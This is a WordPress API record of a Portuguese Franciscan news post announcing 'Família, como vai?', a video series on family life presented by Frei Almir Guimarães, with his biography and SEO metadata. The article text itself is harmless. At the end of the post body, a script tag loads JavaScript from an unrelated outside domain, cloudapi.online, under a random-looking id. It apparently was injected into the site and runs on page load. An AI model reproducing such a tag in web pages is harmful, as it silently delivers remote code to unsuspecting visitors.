{"id":167849,"date":"2018-07-31T23:51:03","date_gmt":"2018-08-01T02:51:03","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=167849"},"modified":"2019-08-19T11:19:00","modified_gmt":"2019-08-19T14:19:00","slug":"familia-e-o-tema-da-nova-serie-da-tvfranciscanos","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html","title":{"rendered":"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos"},"content":{"rendered":"<p><iframe loading=\"lazy\" src=\"https:\/\/www.youtube.com\/embed\/dxZ-NQQigKc\" width=\"100%\" height=\"480\" frameborder=\"0\" allowfullscreen=\"allowfullscreen\"><\/iframe><\/p>\n<p><strong>Frei Augusto Luiz Gabriel<\/strong><\/p>\n<p><strong>S\u00e3o Paulo (SP) \u2013<\/strong> Estreia hoje na <a href=\"https:\/\/www.youtube.com\/tvfranciscanos\" target=\"_blank\" rel=\"noopener noreferrer\">Web TvFranciscanos<\/a>, desta Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil, a s\u00e9rie: &#8220;Fam\u00edlia, como vai?&#8221; Frei Almir Ribeiro Guimar\u00e3es \u00e9 o apresentador e, desta vez, as reflex\u00f5es e partilhas ser\u00e3o\u00a0sobre o tema da fam\u00edlia. E a sua Fam\u00edlia, como vai? Voc\u00ea j\u00e1 parou para pensar? Os v\u00eddeos ser\u00e3o quinzenais e oferecer\u00e3o a oportunidade de uma pequena pausa durante a correria\u00a0 do dia a dia. N\u00e3o deixe de conferir!<\/p>\n<p>Segundo Frei Almir, a fam\u00edlia precisa ser uma comunidade de pessoas que se estimam, uma comunh\u00e3o de vida, de troca de gentilezas, um espa\u00e7o onde as m\u00e1scaras possam cair. \u201cQuantas vezes encontramos um conhecido na rua e a primeira pergunta \u00e9 esta: E a tua fam\u00edlia, como vai?\u201d, recorda o frade, que neste ano completa 80 anos.<\/p>\n<p>Para ele, a fam\u00edlia \u00e9 o lugar humano por excel\u00eancia, o ber\u00e7o do homem, o espa\u00e7o onde se aprende a ser gente, o paradigma dos relacionamentos. Uma das primeiras e fundamentais experi\u00eancias do ser humano se faz no seio da fam\u00edlia, experi\u00eancia de ser gente.<\/p>\n<p>\u201cEm fam\u00edlia, se vive uma comunh\u00e3o de exist\u00eancias. A casa n\u00e3o \u00e9 apenas uma pousada ou um lugar para se proteger da chuva e do sol. Vidas e mist\u00e9rios existenciais circulam pelos c\u00f4modos da casa. A fam\u00edlia \u00e9 um lugar em que o ser humano \u00e9 considerado pelo que \u00e9 e n\u00e3o pelas apar\u00eancias, talentos&#8230; e coisa e tal. Na fam\u00edlia, as pessoas vivem os valores, pr\u00f3prio das pessoas e n\u00e3o dos objetos: reconhecimento, gratuidade, dom e comunh\u00e3o\u201d, ensina o apresentador.<\/p>\n<p>Frei Almir \u00e9 frade franciscano, nascido em Petr\u00f3polis, no Rio de Janeiro. Ingressou na Ordem Franciscana em 1958. Estudou catequese e pastoral no <em>Institut Catholique<\/em> de Paris, a partir de 1965, per\u00edodo em que fez Licenciatura em Teologia. Em 1974, voltou a Paris para se doutorar em Teologia. Tem publicado diversas obras de espiritualidade e, sobretudo, na \u00e1rea da Pastoral Familiar. Foi assessor nacional da CNBB e, desde 1992, \u00e9 solicitado como palestrante e orientador em cursos para assuntos ligados \u00e0 fam\u00edlia. Atuou como p\u00e1roco, assistente de grupos franciscanos em diversos estados e, atualmente, \u00e9 vig\u00e1rio paroquial na Par\u00f3quia do Sagrado Cora\u00e7\u00e3o de Jesus, em Petr\u00f3polis (RJ). Durante anos foi assistente nacional da Ordem Franciscana Secular\u00a0 e hoje \u00e9 assistente das Clarissas do Mosteiro da G\u00e1vea. Tamb\u00e9m atua como redator da Revista \u201cGrande Sinal\u201d e colabora neste site <a href=\"http:\/\/franciscanos.org.br\">franciscanos.org.br<\/a>.<\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Frei Almir Guimar\u00e3es<\/p>\n","protected":false},"author":5,"featured_media":209083,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[141,588,58,257],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"Frei Almir Guimar\u00e3es\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2018-08-01T02:51:03+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-08-19T14:19:00+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"180\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"freiaugusto\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"freiaugusto\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg\",\"width\":273,\"height\":180},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html\",\"name\":\"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#primaryimage\"},\"datePublished\":\"2018-08-01T02:51:03+00:00\",\"dateModified\":\"2019-08-19T14:19:00+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91\",\"name\":\"freiaugusto\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g\",\"caption\":\"freiaugusto\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html","og_locale":"pt_BR","og_type":"article","og_title":"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos","og_description":"Frei Almir Guimar\u00e3es","og_url":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2018-08-01T02:51:03+00:00","article_modified_time":"2019-08-19T14:19:00+00:00","og_image":[{"width":273,"height":180,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg","type":"image\/jpeg"}],"author":"freiaugusto","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"freiaugusto","Est. tempo de leitura":"2 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#primaryimage","url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg","contentUrl":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2018\/07\/familia_2018-150x103-1.jpg","width":273,"height":180},{"@type":"WebPage","@id":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#webpage","url":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html","name":"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos - Not\u00edcias - Franciscanos","isPartOf":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#website"},"primaryImageOfPage":{"@id":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#primaryimage"},"datePublished":"2018-08-01T02:51:03+00:00","dateModified":"2019-08-19T14:19:00+00:00","author":{"@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91"},"breadcrumb":{"@id":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/franciscanos.org.br\/noticias\/familia-e-o-tema-da-nova-serie-da-tvfranciscanos.html#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/franciscanos.org.br\/noticias"},{"@type":"ListItem","position":2,"name":"Fam\u00edlia \u00e9 tema da nova s\u00e9rie da TvFranciscanos"}]},{"@type":"Person","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/37f88f0d111cd5358b12a6556a99eb91","name":"freiaugusto","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9840b940e621801b24f3e6b059efb4b7?s=96&d=mm&r=g","caption":"freiaugusto"},"url":"https:\/\/franciscanos.org.br\/noticias\/author\/freiaugusto"}]}},"_links":{"self":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/167849"}],"collection":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/users\/5"}],"replies":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/comments?post=167849"}],"version-history":[{"count":0,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/posts\/167849\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media\/209083"}],"wp:attachment":[{"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/media?parent=167849"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/categories?post=167849"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/franciscanos.org.br\/noticias\/wp-json\/wp\/v2\/tags?post=167849"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}